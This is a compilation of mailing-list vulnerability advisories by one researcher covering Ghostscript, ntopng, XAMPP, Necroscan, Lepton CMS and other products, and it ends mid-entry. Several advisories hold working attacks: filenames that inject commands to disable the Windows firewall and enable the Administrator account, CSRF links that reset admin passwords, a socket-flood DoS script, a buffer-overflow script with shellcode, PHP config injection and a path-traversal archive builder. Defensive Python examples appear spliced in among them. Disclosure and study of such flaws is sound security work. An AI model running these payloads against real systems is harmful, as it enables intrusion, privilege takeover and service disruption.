ghostscript.com



Product:

Ghostscript 9.20 
gs920w32.exe
Windows (32 bit)
hash: fee2cc1b8b467888a4ed44dd9f4567ed


Ghostscript is a suite of software based Postscript and PDF 
interpreter/renderers for file conversion.


Vulnerability Type:
==
Filename Command Execution 



CVE Reference:
==
N/A



Security Issue:

The ghostscript ps2epsi translator, used to process ".ps" files, executes arbitrary 
commands from specially crafted filenames that contain
OS commands as part of the processed postscript file's name. This behaviour seems 
to occur only with the ps2epsi translator;
other tested GS translator calls like 'ps2pdf' fail.

c:\>ps2epsi
"Usage: ps2epsi  "

Example: take a file "POC&;1.ps"; it will run the arbitrary 
commands contained after the ampersand character "&".

If a user runs an automated script that calls the ps2epsi translator to process 
".ps" files from a remote share or directory
where the actual filenames are unknown, it can potentially allow attackers to execute 
arbitrary commands on the victim's machine.

Characters like "/", ":" are restricted in filenames, but we can abuse Windows 
netsh and wmic to bypass some of these barriers.

Quick Ghostscript CL test.
Create file called Test1.ps

ps2epsi "Test1.ps"  outfile

BOOM! calc.exe runs...


Exploit/POC:
=
Add the Ghostscript lib directory 'c:\Program Files (x86)\gs\gs9.20\lib' to the Windows 
environment Path so the 'ps2epsi' GS command can be called directly.

Create the following malicious ".ps" postscript files.

1) Turn off Windows Firewall
Test Advfirewall set allprofiles state off&;1.ps


2) Enable Windows Administrator account (using WMIC).
Test useraccount where name='administrator' set disabled='false'&;1.ps

If the user doesn't have wmic on the path, fix it for the POC by setting the system 
environment variable: add "C:\Windows\system32\wbem;" to the 'Path' variable.

Run the bat script below to process a batch of "*.ps" files.

"POC.bat"

@echo off
rem ghostscript Filename Command Execution POC
rem by hyp3rlinx

rem pass every .ps file in the current directory to ps2epsi; the filename itself is the trigger
for %%f in (*.ps) do ps2epsi "%%f" "evil.ps"


Severity:
=
Medium



Disclosure Timeline:
===
Vendor Notification: No replies
February 2, 2017 : Public Disclosure




hyp3rlinx


PEAR HTTP_Upload v1.0.0b3 Arbitrary File Upload

2017-01-25 Thread hyp3rlinx
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PEAR-HTTP_UPLOAD-ARBITRARY-FILE-UPLOAD.txt
[+] ISR: ApparitionSEC   



Vendor:

pear.php.net



Product:

HTTP_Upload v1.0.0b3

Download:
https://pear.php.net/manual/en/package.http.http-upload.php

Easy and secure management of files submitted via HTML Forms.

pear install HTTP_Upload

This class provides an advanced file uploader system for file uploads made
from html forms. Features:
* Can handle from one file to multiple files.
* Safe file copying from tmp dir.
* Easy detecting mechanism of valid upload, missing upload or error.
* Gives extensive information about the uploaded file.
* Rename uploaded files in different ways: as it is, safe or unique
* Validate allowed file extensions
* Multiple languages error messages support (es, en, de, fr, it, nl, pt_BR)


Vulnerability Type:
==
Arbitrary File Upload



CVE Reference:
==
N/A



Vulnerability Details:
=

The package comes with an "upload_example.php" file to test the package; when 
uploading a "restricted" PHP file
the user will get a message like "Unauthorized file transmission".

Line: 488 of "Upload.php"
var $_extensionsCheck = array('php', 'phtm', 'phtml', 'php3', 'inc');

Going through the "Upload.php" code line by line, the user will find an 
option to set a case-sensitive check,
e.g. Line: 503  "$_extensionsCaseSensitive"=true

Line: 874

 * @param bool $case_sensitive whether extension check is case sensitive.
 *                             When it is case insensitive, the extension
 *                             is lowercased before compared to the array
 *                             of valid extensions.


This setting looks intended to prevent bypassing the disallowed PHP file type check 
with mixed- or upper-case extensions before uploading. 

However, some developers are unaware that "Apache" can process a file with an 
extension like PHP.1, PHP.; etc. 
if the last extension is not specified in the list of mime-types known to the 
web server.

Therefore, attackers can easily bypass the security check by appending ".1" to 
the end of the file name,
which can result in arbitrary command execution on the affected server.

e.g.

"ext_bypass.php.1" contents:




Successfully Tested on: Bitnami wampstack-5.6.29-0.
Server version: Apache/2.4.23 (Win64)

Successfully Tested on: XAMPP for Linux 5.6.8-0
Server version: Apache/2.4.12 (Unix)
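
The bypass works because the check only looks at the text after the last dot, while Apache evaluates every dot-separated segment. The added example below, which is not PEAR's code, shows a check modelled on that last-extension logic beside one that inspects every segment and applies an allow-list, then stores the file under a server-chosen name; the allow-list, filenames and function names are constructed for the demonstration.

```python
import secrets

# Mirrors the advisory's $_extensionsCheck deny-list
BLOCKED = {"php", "phtm", "phtml", "php3", "inc"}
# Assumption: what this particular upload form is meant to accept
ALLOWED = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def last_extension_blocked(filename: str, case_sensitive: bool = False) -> bool:
    """The pattern the advisory describes: only the text after the final dot is
    compared, so "ext_bypass.php.1" passes even though Apache may still hand it to PHP."""
    ext = filename.rsplit(".", 1)[1] if "." in filename else ""
    if not case_sensitive:
        ext = ext.lower()
    return ext in BLOCKED


def is_safe_upload_name(filename: str) -> bool:
    """Check every dot-separated segment, the way mod_mime sees multiple extensions."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any client-supplied path
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False                                         # no extension, or a dotfile like .htaccess
    segments = [p.lower() for p in parts[1:]]
    if any(s in BLOCKED for s in segments):
        return False                                         # "x.php.1", "x.PHP.jpg" are refused
    # An allow-list over every segment also refuses empty segments ("x.php.") and
    # handler extensions this deny-list never heard of.
    return all(s in ALLOWED for s in segments)


def stored_name(filename: str) -> str:
    """Store under a server-chosen random name carrying only the validated extension,
    so the on-disk extension chain is never controlled by the uploader."""
    if not is_safe_upload_name(filename):
        raise ValueError("rejected upload name")
    return f"{secrets.token_hex(16)}.{filename.rsplit('.', 1)[1].lower()}"


if __name__ == "__main__":
    for candidate in ("photo.jpg", "ext_bypass.php.1", "shell.PHP.jpg", ".htaccess"):
        print(candidate, "last-ext blocked:", last_extension_blocked(candidate),
              "safe:", is_safe_upload_name(candidate))
```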



Disclosure Timeline:
==
Vendor Notification: December 31, 2016
Similar bug reported and open 2012
Issue Fixed: January 17, 2017
January 25, 2017  : Public Disclosure




Severity Level:

High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


NTOPNG Web Interface v2.4 CSRF Token Bypass

2017-01-22 Thread hyp3rlinx
[+]#
[+] Credits / Discovery: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt
[+] ISR: ApparitionSEC
[+]#



Vendor:

www.ntop.org


Product:

ntopng Web Interface
v2.4.160627 

ntopng is the next generation version of the original ntop, a network traffic 
probe that shows the network usage, similar
to what the popular top Unix command does. ntopng is based on libpcap and it 
has been written in a portable way in order to
virtually run on every Unix platform, MacOSX and on Windows as well.


Vulnerability Type:
==
CSRF Token Bypass 



CVE Reference:

CVE-2017-5473



Security Issue:
=
Simply omitting the CSRF token or supplying arbitrary token values bypasses 
CSRF protection when making HTTP requests
to the ntopng web interface, allowing remote attackers to make HTTP requests 
on an authenticated user's behalf if
the user clicks a malicious link or visits an attacker's web page etc.


Exploit/POC:


1) Change admin password 
http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED=admin_password=xyz123_new_password=xyz123


2) Add arbitrary 

http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED; 
method="GET">







document.forms[0].submit()




Disclosure Timeline:
=
Vendor Notification: January 11, 2017
Vendor acknowledgement: January 12, 2017
Vendor Fixed Issue
January 20, 2017 : Public Disclosure



Network Access:
===
Remote


Impact:
==
Information Disclosure
Privilege Escalation



Severity:
===
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.  All content (c) HYP3RLINX - Apparition

Hyp3rlinX 


XAMPP Control Panel Memory Corruption Denial Of Service

2016-12-25 Thread HYP3RLINX
[+] Credits: John Page (hyp3rlinx)  

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt

[+] ISR: ApparitionSec



Vendor:
=
www.apachefriends.org




Product:
===
XAMPP Control Panel


XAMPP is a free and open source cross-platform web server solution stack 
package developed by Apache Friends,
consisting mainly of the Apache HTTP Server, MariaDB database, and interpreters 
for scripts written in the PHP
and Perl programming languages.



Vulnerability Type:
=
Memory Corruption DOS



CVE Reference:
==
N/A



Vulnerability Details:
=

XAMPP Control Panel crashes with access violation when writing junk bytes into 
several different ports e.g.

Tested following ports / versions:

(MySQL) 3306 v3.2.2
(Tomcat) 8080 (XAMPP v3.1.0)
(FileZilla) 21
(Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.

It is not that XAMPP Control Panel is listening on some port; however, memory 
corruption and Denial Of Service do
occur when you constantly write junk into, for instance, the MySQL, Tomcat, 
FileZilla or Mercury Mail listening ports.


1) Launch XAMPP control panel
2) Run the exploit script against some ports like 3306, 79, 105 (Mercury Mail) 
with Apache and/or Tomcat running

Target different services and port combinations to reproduce.

Important to note is that neither MySQL nor Apache itself crashes; it IS the 
XAMPP Control Panel that crashes with an Access Violation.


Tested Windows SP1


POC Video:
https://vimeo.com/196938261


Exploit code(s):
===


import socket

print "XAMPP Control Panel DOS"
print "Discovery: John Page (hyp3rlinx)"
print "ApparitionSec"
print "hyp3rlinx.altervista.org\r\n"

IP = raw_input("[IP]> ")
PORT = raw_input("[PORT]> ")

arr=[]
c=0
while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send("DOOM")
        print "Die!"
        c+=1
    except socket.error:
        print "[+] Done! "
        raw_input()
        break




Disclosure Timeline:
===
Vendor Notification: November 1, 2016
Vendor acknowledgement: November 4, 2016
Vendor released Fix : December 22, 2016 
(NO public mention as of the time of this writing)
December 24, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


Adobe Animate <= v15.2.1.95 Memory Corruption Vulnerability

2016-12-14 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ADOBE-ANIMATE-MEMORY-CORRUPTION-VULNERABILITY.txt

[+] ISR: ApparitionSec



Vendor:
=
www.adobe.com



Product(s):
=
Adobe Animate
15.2.1.95 and earlier versions 

Adobe Animate (formerly Adobe Flash Professional, Macromedia Flash, and 
FutureSplash Animator) is a multimedia authoring and computer
animation program developed by Adobe Systems.



Platforms:
===
Windows / Macintosh



Vulnerability Type:
===
Critical Memory Corruption Vulnerability



CVE Reference:
==
CVE-2016-7866
APSB16-38



Vulnerability Details:
=
Adobe Animate suffers from a Buffer Overflow when creating .FLA files with 
ActionScript Classes that use overly long Class names.
This causes memory corruption leading to possible arbitrary code execution upon 
opening a maliciously created .FLA Flash file.


Reproduction / POC:

 
1) Create FLA with overly long Class name in FLA Class publish properties input 
field.
2) Save and close
3) Reopen FLA, click edit to open the .as script file 
4) "ctrl + s" to save then boom access violation 


Distributed:
Create a new ".as" ActionScript 3 (AS3) file and give it a very long class name 
in the input field, then hit "Ctrl+s" to save;
you will crash the IDE. The next way described is ONE way attackers can 
distribute a malicious .FLA.

Abusing JSFL, the Flash JavaScript application programming interface 
(JavaScript API or JSAPI).

1) Create following .JSFL file

fl.getDocumentDOM().save();
fl.getDocumentDOM().testMovie();

2)  Create a MovieClip stored in the FLA library with a very long class name that 
extends MovieClip and export
   it for ActionScript etc...


3) Drag the MovieClip to the stage


4) Bundle the FLA/JSFL files and make them available for download as an example 
of how to use JSFL to call the save() / publish() functions.


User opens the .FLA, runs the harmless-looking JSFL code, then BOOM!



Reference:
https://helpx.adobe.com/security/products/animate/apsb16-38.html




Disclosure Timeline:
=
Vendor Notification: May 28, 2016
December 13, 2016  : Public Disclosure




Exploitation Technique:
===
Local




Severity Level:

High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


Puppet Enterprise Web Interface Authentication Redirect

2016-10-22 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PUPPET-AUTHENTICATION-REDIRECT.txt

[+] ISR: ApparitionSec



Vendor:
==
www.puppet.com



Product:

Puppet Enterprise Web Interface 
Version < 2016.4.0

Puppet Enterprise is the leading platform for automatically delivering, 
operating and securing your infrastructure.


Vulnerability Type:
=
Authentication Redirect



CVE Reference:
==
CVE-2016-5715



Vulnerability Details:
=

When logging into the Puppet Enterprise Web Interface, users can be redirected to 
attacker-controlled servers; if a user logs in
using an attacker-supplied authentication link, it can result in credential 
theft etc.

Fixed in version 2016.4.0

References:
https://puppet.com/security/cve/cve-2016-5715


Exploit code(s):
===

To bypass the character filters you need to pass double forward slashes "//", or 
the redirect will fail.

https://victim-puppet-server/auth/login?redirect=//attacker-server
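The "//" detail above is the classic weakness of redirect filters that only ask for a leading slash: a scheme-relative URL starts with a slash and still carries a host. The following is an added example, not Puppet's code, that validates a redirect parameter by accepting only same-site paths; it normalises backslashes (browsers treat "/\host" like "//host") and rejects any value that resolves to a new authority. The function names are assumptions.

```python
# Added example, not Puppet's code.  A redirect-target validator that
# accepts only same-site paths and rejects the scheme-relative
# "//attacker-server" form from the advisory, which a naive
# "must start with a slash" filter lets through.
from urllib.parse import urlsplit


def naive_redirect_ok(target: str) -> bool:
    """The kind of filter the advisory's payload bypasses: it only checks
    for a leading slash and the absence of a scheme separator."""
    return target.startswith("/") and "://" not in target


def safe_redirect_target(target: str, default: str = "/") -> str:
    """Return target if it is a local path, otherwise fall back to default."""
    if not target:
        return default
    # Browsers accept a backslash where a slash is expected ("/\host") and
    # strip surrounding whitespace, so normalise before inspecting.
    candidate = target.strip().replace("\\", "/")
    # "//host" and "///host" are both resolved as a new authority.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    parts = urlsplit(candidate)
    # Belt and braces: anything urlsplit sees as a scheme or host is not local.
    if parts.scheme or parts.netloc:
        return default
    return candidate
```

The safer design, where the application can afford it, is to store the post-login destination server side and redirect only to known route names, so no user-controlled URL is ever consulted.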



Disclosure Timeline:
==
Vendor Notification: August 23, 2016
Vendor Acknowledgement: August 23, 2016
Vendor Releases Fix: in version 2016.4.0
October 17, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


Necroscan <= v0.9.1 Buffer Overflow

2016-08-25 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NECROSCAN-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
===
nscan.hypermart.net



Product:
==
NECROSOFT NScan version <= v0.9.1
ver 0.666 build 13 
circa 1999

NScan is one of the fastest and most flexible port scanners for Windows. It is 
specially designed for scanning large networks and gathering
related network/host information. It supports remote monitoring, usage of host 
and port lists, option profiles, speed and accuracy tuning,
etc. It also contains a traceroute, dig and whois, which work together with the 
scanner.



Vulnerability Type:

Buffer Overflow




Vulnerability Details:
=

dig.exe is a component of Necroscan 'nscan.exe' that performs DNS lookups; this 
component has a trivial buffer overflow vulnerability.
With 1,001 bytes we get a direct EIP overwrite, and our shellcode will be sitting 
at the ESP register.

Important: we need \x2E\x2E in the WinExec(calc.exe) shellcode, as once a single 
\x2E (".") is injected it gets converted to an unusable character and the 
shellcode will fail
to execute. However, we can bypass this by double padding our shellcode with 
\x2E\x2E instead of a single \x2E; now it will execute!

payload="A"*997+"" <= EIP is here

1) use mona or findjmp.exe to get suitable JMP ESP register
2) run python script below to generate exploit payload
3) paste payload into DNS lookup 'Target' input field
4) Click 'TCP lookup' button
5) BOOM see calc.exe run!


Stack dump...

EAX 0021
ECX 2D68
EDX 01C9E8B8
EBX 756EFA00 kernel32.756EFA00
ESP 036BFEE0 ASCII "calc"
EBP 756C2C51 kernel32.WinExec
ESI 002D4A78
EDI 756EFA28 kernel32.756EFA28
EIP 036BFF58
C 0  ES 002B 32bit 0()
P 1  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 1  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFD7000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_NO_MORE_FILES (0012)
EFL 0246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
   3 2 1 0  E S P U O Z D I
FST   Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask1 1 1 1 1 1



Exploit code(s):
===

import struct

#Author: hyp3rlinx
#ISR: ApparitionSec
#Site: hyp3rlinx.altervista.org
#

#Necroscan nscan.exe Local Buffer Overflow POC
#dig.exe is a component of Necroscan that does DNS lookups
#this component has a trivial buffer overflow vulnerability.
#payload="A"*1001 #EIP is here
#paste generated exploit into DNS lookup 'Target' input field
#Click 'TCP lookup' button
#BOOM!
#Important need .. \x2E\x2E in the shellcode! (calc.exe)
#Tested successfully Windows 7 SP1
#No suitable JMP register in the vulnerable program, they contain null bytes,
#have to use !mona jmp -r esp plugin or findjmp.exe.

rp=struct.pack("<L", 0x75658BD5)  #JMP ESP kernel32

# Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x2E\x65\x78\x65"  #<=== \x2E\x2E (Deal with "." character problem)
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


payload="A"*997+rp+"\x90"*10+sc

file=open("NECRO", "w")
file.write(payload)
file.close()

print '=== Exploit payload created! ==='
print '=== HYP3RLINX | APPARITIONsec ==='



Exploitation Technique:
===
Local



Severity Level:

High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


Lepton CMS PHP Code Injection

2016-08-16 Thread hyp3rlinx
[+] Credits: John Page (HYP3RLINX)

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt

[+] ISR: ApparitionSec



Vendor:
==
www.lepton-cms.org



Product:
=
Lepton CMS 2.2.0 / 2.2.1 (update)

LEPTON is an easy-to-use but fully customizable Content Management System (CMS).




Vulnerability Type:
===
PHP Code Injection



CVE Reference:
==
N/A



Vulnerability Details:
=

No input validation check is done on the "Database User" input field when 
entering Lepton CMS setup information using the Install Wizard.
Therefore, a malicious user can input whatever they want into "config.php", which 
can allow PHP Remote Command Execution on the host system.

e.g.

In the database username field, use a single quote to close the "DB_USERNAME" 
value, then open our own PHP tags.

');?>

Now in "config.php" the Database username becomes ===> define('DB_USERNAME', 
'');?>');

A security check is attempted by Lepton to disallow multiple HTTP requests for 
"config.php". On line 3 of the "config.php" file we find:

///

if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted to load \'config.php\' twice!!
Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); }

///

However, the security check is placed on line 3, well before "LEPTON_PATH" has 
been defined, allowing a complete bypass of that access control check.
Now we can inject our own PHP code into the config, allowing Remote Command 
Execution or Local/Remote File Includes etc...

Next, make an HTTP GET request to "http://victim-server/upload/install/save.php" 
again and code execution will be achieved, or request "config.php"
directly, as the security check made on line 3 of "config.php" to prevent 
multiple HTTP requests to "config.php" does not work anyway. 

In situations where an installation script is provided as part of some default 
image, often made available as a convenience by hosting providers, this can
be used to gain code execution on the target system and bypass whatever 
security access controls/restrictions are in place.
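The root cause above is an installer that writes a user-supplied value straight into a PHP string literal. The following is an added example, not Lepton's installer code: it shows that interpolation beside a writer that allow-lists the database user name and, independently, encodes every value with PHP's single-quote escaping rules, so a value such as ');?> can neither terminate the literal nor close the PHP block. The allow-list pattern and function names are assumptions.

```python
# Added example, not Lepton's installer code.  Shows the interpolation the
# advisory describes beside a writer that validates the database user name
# and emits PHP string literals with proper single-quote escaping, so a
# value such as  ');?>  can never terminate the literal or the PHP block.
import re

# Hypothetical allow-list for a database user name; adjust to the DBMS.
DB_USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def weak_define(name: str, value: str) -> str:
    """What the vulnerable installer effectively does: raw interpolation."""
    return f"define('{name}', '{value}');"


def php_single_quoted(value: str) -> str:
    """Encode value as a PHP single-quoted literal.  Inside '...' only the
    backslash and the quote are special; escape the backslash first."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def safe_define(name: str, value: str) -> str:
    """Emit define() with the constant name restricted to identifier chars."""
    if not re.fullmatch(r"[A-Z_][A-Z0-9_]*", name):
        raise ValueError(f"bad constant name: {name!r}")
    return f"define('{name}', {php_single_quoted(value)});"


def username_is_valid(value: str) -> bool:
    return DB_USERNAME_RE.fullmatch(value) is not None


def render_config(db_user: str, db_password: str) -> str:
    """Generate config.php.  The user name is allow-listed; the password may
    legitimately contain any character, so escaping alone protects it.  No
    closing ?> is emitted, so a stray one in the output is a red flag."""
    if not username_is_valid(db_user):
        raise ValueError("database user name contains disallowed characters")
    lines = ["<?php",
             safe_define("DB_USERNAME", db_user),
             safe_define("DB_PASSWORD", db_password)]
    return "\n".join(lines) + "\n"


def php_block_escaped(config_text: str) -> bool:
    """Detection helper for generated configs: True if a value closed the PHP block."""
    return "?>" in config_text
```

Running weak_define with the advisory's value reproduces the broken define() line shown above exactly; safe_define on the same input yields define('DB_USERNAME', '\');?>');, which PHP reads back as the literal string ');?> .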

References:
http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php


Exploit code(s):
===

1) At step 4 of Lepton's Install Wizard, enter ');?> 
for the Database User name, then fill in the rest of the fields

2) Click go to step 5 and fill in required fields, then click "Install LEPTON"

3) Make HTTP GET request to:

 http://localhost/LEPTON_stable_2.2.0/upload/install/save.php  

  OR 

 http://localhost/LEPTON_stable_2.2.0/upload/config.php


BOOM pop calc.exe...



Disclosure Timeline:
===
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016  : Public Disclosure




Severity Level:

High


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


Lepton CMS Archive Directory Traversal

2016-08-16 Thread hyp3rlinx
[+] Credits: John Page (HYP3RLINX)

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt

[+] ISR: ApparitionSec



Vendor:
==
www.lepton-cms.org



Product:
=
Lepton CMS 2.2.0 / 2.2.1 (update)

LEPTON is an easy-to-use but fully customizable Content Management System (CMS).


Vulnerability Type:

Archive Directory Traversal 



CVE Reference:
==
N/A



Vulnerability Details:
=

Lepton has a feature that lets users install new modules. If a malicious user 
uploads an archive and the module is not valid, it
will generate an error. However, the malicious archive will still get 
decompressed, and no check is made for ../ characters in
the file name, allowing arbitrary PHP files to be placed outside the intended 
target directory for installed modules. This can
then be used to execute remote commands on the affected host system. 

e.g.

We get the error message below under the "Add Ons" tab, Install Module:

Invalid LEPTON installation file. Please check the *.zip format.[1]

The archive still gets decompressed and the malicious file is moved outside of the 
intended target directory by using ../ in the file name.
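The fix for this class of bug is to validate every member name before anything is extracted. The following is an added example, not Lepton's module installer: it normalises backslashes (the advisory's archive uses ..\..\RCE.php), rejects absolute paths, drive letters and NUL bytes, and requires the resolved destination of each entry to stay inside the module directory. The module directory path and function names are assumptions.

```python
# Added example, not Lepton's module installer.  Every entry name in an
# uploaded ZIP is treated as untrusted: backslashes are normalised (the
# advisory's archive uses ..\..\RCE.php), absolute paths, drive letters
# and NUL bytes are rejected, and the resolved destination must stay
# inside the module directory.  The directory path is a placeholder.
import io
import posixpath
import zipfile
from typing import List, Sequence, Tuple

MODULE_DIR = "/srv/lepton/modules"  # hypothetical install target


def entry_is_safe(name: str, target_dir: str = MODULE_DIR) -> bool:
    """True if extracting `name` under target_dir cannot escape it."""
    normalised = name.replace("\\", "/")
    if "\x00" in normalised or normalised.startswith("/"):
        return False
    if len(normalised) > 1 and normalised[1] == ":":  # Windows drive letter
        return False
    root = target_dir.rstrip("/")
    # normpath collapses the '..' segments so we can see where the path lands.
    dest = posixpath.normpath(posixpath.join(root, normalised))
    return dest == root or dest.startswith(root + "/")


def unsafe_entries(zip_bytes: bytes) -> List[str]:
    """Names of entries that must block the whole extraction."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [info.filename for info in zf.infolist()
                if not entry_is_safe(info.filename)]


def build_sample_zip(entries: Sequence[Tuple[str, bytes]]) -> bytes:
    """Constructed test fixture: build an archive with the given members.
    zipfile does not sanitise names on write, so '..' survives as-is."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries:
            zf.writestr(name, data)
    return buf.getvalue()
```

Note the trailing slash in the containment test: without it, an entry resolving to /srv/lepton/modules_evil/x.php would pass a plain prefix comparison. An archive with any unsafe entry should be rejected as a whole, not extracted minus the bad members.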


Exploit code(s):
===

";exit();}
$file_name=$argv[1];

$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '');
$zip->close();

echo "Malicious archive created...\r\n";
echo "= hyp3rlinx ";
?>




Disclosure Timeline:
===
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016  : Public Disclosure




Exploitation Technique:
===
Local



Severity Level:

High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


WSO2-CARBON v4.4.5 CSRF / DOS

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
